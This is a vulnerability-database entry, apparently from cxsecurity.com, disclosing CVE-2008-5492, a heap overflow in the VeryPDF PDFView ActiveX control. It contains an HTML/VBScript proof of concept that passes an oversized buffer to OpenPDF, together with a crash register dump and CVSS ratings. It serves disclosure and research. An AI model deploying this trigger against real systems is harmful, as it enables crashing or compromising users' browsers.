VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow PoC

2008.12.13
Credit: r0ut3r
Risk: High
Local: Yes
Remote: No
CVE: CVE-2008-5492
CWE: CWE-119


Ogólna skala CVSS: 9.3/10
Znaczenie: 10/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

<!-- VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow Discovered & Written By: r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au) Advisory: http://www.bmgsec.com.au/advisory/39/ --------------------------------------------------- Tested on: WinXP Pro SP2 Version: 2.0.0.1 GUID: {433268D7-2CD4-43E6-AA24-2188672E7252} RegKey Safe for Script: True RegKey Safe for Init: True EAX 0003C910 ASCII "AAAAAAAAA"" ECX 000301D0 EDX 00000040 EBX 41414141 ESP 0013B8D8 EBP 0013BAF4 ESI 0003C908 ASCII "AAAAAAAAAAAAAAAAA"" EDI 41414141 EIP 7C91B3FB ntdll.7C91B3FB --> <object classid='clsid:433268D7-2CD4-43E6-AA24-2188672E7252' id='target'></object> <script language='vbscript'> Sub Boom buff = String(1006, "A") target.OpenPDF buff, 1, 1 End Sub </script> <input type=button onclick=Boom() value='Boom?'>

Referencje:

http://www.bmgsec.com.au/advisories/openpdf.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top